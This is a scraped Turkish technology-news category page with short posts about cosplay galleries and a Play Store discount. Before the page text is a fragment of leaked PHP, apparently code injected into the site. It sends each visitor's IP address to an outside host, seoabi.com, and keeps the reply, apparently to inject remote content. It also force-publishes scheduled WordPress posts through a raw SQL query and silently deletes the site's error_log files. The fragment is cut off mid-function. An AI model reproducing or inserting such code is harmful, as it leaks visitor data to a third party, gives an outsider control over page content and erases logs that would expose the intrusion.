$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> batman | Teknoloji Haberleri

batman kategorisindeki tüm yazılar

Son Yazılar

En Yetenekli Cosplayler

Oyun, film, anime ve hatta çizgi film kahramanlarının en başarılı cosplaylerini görmek için galerimize girerek görebilirsiniz.

Play Store’daki İndirimin Beşinci Günü

Google’ın 25 Cent fiyata düşürdüğü uygulamaları hergün farklı olarak Play Store’da bizlere yayınlıyor. Bugünün indirimli uygulamaları neler hep beraber bakalım. Google, Play Store‘un 25 milyar indirilmeye ulaştığını ve toplam uygulamasayısının 675.000‘i geçtiğini buradaki haberimizle sizlere paylaşmıştık. Google bu başarının şerefine belli bir süre her gün değişik 13 uygulamayı sadece 0.25 Dolar ya da 25 Cent fiyat etiketiyle bizlere sunuyor.